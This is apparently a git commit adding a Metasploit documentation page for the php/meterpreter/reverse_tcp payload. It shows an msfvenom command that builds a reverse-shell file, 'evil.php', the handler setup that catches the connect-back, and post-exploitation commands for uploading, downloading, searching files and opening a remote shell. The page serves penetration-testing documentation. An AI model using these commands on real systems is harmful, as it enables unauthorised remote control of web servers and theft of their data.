Create reverse_tcp.md (#1)
parent
fa016de78a
commit
cb870b3d07
|
@ -0,0 +1,154 @@
|
|||
The php/meterpreter/reverse_tcp is a staged payload used to gain meterpreter access to a compromised system. This is a unique payload in the Metasploit Framework because this payload is one of the only payloads that are used in RFI vulnerabilities in web apps. This module _can_ be cross platform, but the target needs to be able to run php code.
|
||||
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
The PHP Meterpreter is suitable for any system that supports PHP. For example, the module can be used against webservers which run PHP code for a website. OS X has PHP installed by default.
|
||||
|
||||
## Deploying php/meterpreter/reverse_tcp
|
||||
### Scenarios
|
||||
|
||||
Specific demo of using the module that might be useful in a real world scenario.
|
||||
|
||||
#### Generating a file with msfvenom
|
||||
```
|
||||
msfvenom -p php/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o evil.php
|
||||
```
|
||||
|
||||
|
||||
#### Starting a listener
|
||||
```
|
||||
msf > use multi/handler
|
||||
msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
|
||||
PAYLOAD => php/meterpreter/reverse_tcp
|
||||
msf exploit(handler) > set LHOST [IP]
|
||||
```
|
||||
|
||||
## Important Basic Commands
|
||||
|
||||
Compared to a native Meterpreter such as windows/meterpreter/reverse_tcp, the PHP Meterpreter
|
||||
has less commands, but here's a list of all the common ones you might need:
|
||||
|
||||
**pwd command**
|
||||
|
||||
The ```pwd``` command tells you the current working directory. For example:
|
||||
|
||||
```
|
||||
meterpreter > pwd
|
||||
/Users/thecarterb/Desktop
|
||||
```
|
||||
|
||||
**cd command**
|
||||
|
||||
The ```cd``` command allows you to change directories. Example:
|
||||
|
||||
```
|
||||
meterpreter > cd /Users/thecarterb/Desktop
|
||||
meterpreter > pwd
|
||||
/Users/thecarterb/Desktop
|
||||
```
|
||||
|
||||
**cat command**
|
||||
|
||||
The ```cat``` command allows you to see the content of a file:
|
||||
|
||||
```
|
||||
meterpreter > cat /tmp/data.txt
|
||||
Hello World!
|
||||
```
|
||||
|
||||
**upload command**
|
||||
|
||||
The ```upload``` command allows you to upload a file to the remote target. This is useful for uploading additional payload files. For example:
|
||||
|
||||
```
|
||||
meterpreter > upload /tmp/data.txt /Users/thecarterb/Desktop
|
||||
[*] uploading : /tmp/data.txt -> /Users/thecarterb/Desktop
|
||||
[*] uploaded : /tmp/data.txt -> /Users/thecarterb/Desktop/data.txt
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
**download command**
|
||||
|
||||
The ```download``` command allows you to download a file from the remote target to your machine.
|
||||
For example:
|
||||
|
||||
```
|
||||
meterpreter > download /Users/thecarterb/Desktop/data.txt /tmp/pass.txt
|
||||
[*] downloading: /Users/thecarterb/Desktop/data.txt -> /tmp/pass.txt/data.txt
|
||||
[*] download : /Users/thecarterb/Desktop/data.txt -> /tmp/pass.txt/data.txt
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
**search command**
|
||||
|
||||
The ```search``` command allows you to find files on the remote file system. For example,
|
||||
this shows how to find all text files in the current directory:
|
||||
|
||||
```
|
||||
meterpreter > search -d . -f *.txt
|
||||
Found 2 results...
|
||||
.\pass.txt (13 bytes)
|
||||
./creds\data.txt (83 bytes)
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
Without the ```-d``` option, the command will attempt to search in all drives.
|
||||
|
||||
The ```-r``` option for the command allows you to search recursively.
|
||||
|
||||
|
||||
**getuid command**
|
||||
|
||||
The ```getuid``` command tells you the current user that Meterpreter is running on. For example:
|
||||
|
||||
```
|
||||
meterpreter > getuid
|
||||
Server username: root
|
||||
```
|
||||
|
||||
**execute command**
|
||||
|
||||
The ```execute``` command allows you to execute a command or file on the remote machine.
|
||||
|
||||
The following examples uses the command to create a text file:
|
||||
|
||||
```
|
||||
meterpreter > execute -f echo -a "hello > /tmp/hello.txt"
|
||||
Process 73642 created.
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
**ps command**
|
||||
|
||||
The ```ps``` command lists the running processes on the remote machine.
|
||||
|
||||
**shell command**
|
||||
|
||||
The ```shell``` command allows you to interact with the remote machine's command prompt (or shell).
|
||||
For example:
|
||||
|
||||
```
|
||||
meterpreter > shell
|
||||
Process 74513 created.
|
||||
Channel 2 created.
|
||||
sh-3.2#
|
||||
```
|
||||
|
||||
If you wish to get back to Meterpreter, do [CTRL]+[Z] to background the channel.
|
||||
|
||||
**sysinfo**
|
||||
|
||||
The ```sysinfo``` command shows you basic information about the remote machine. Such as:
|
||||
|
||||
* Computer name
|
||||
* OS name
|
||||
* Architecture
|
||||
* Meterpreter type
|
||||
|
||||
## Using `post` modules
|
||||
When using the PHP Meterpreter, you have the feature of using Metasploit's `post` modules on that specific session. By default, most `multi` post modules will work; however, you can also use OS specific modules depending on the OS of the compromised system. For example, if you have a PHP Meterpreter session running on OS X, you can use `osx` post modules on that session.
|
||||
|
||||
__Don't forget to:__
|
||||
- Set the `LHOST` datastore option to the connect-back IP Address
|
||||
- If you want to get multiple shells, set `ExitOnSession` to `false`
|
Loading…
Reference in New Issue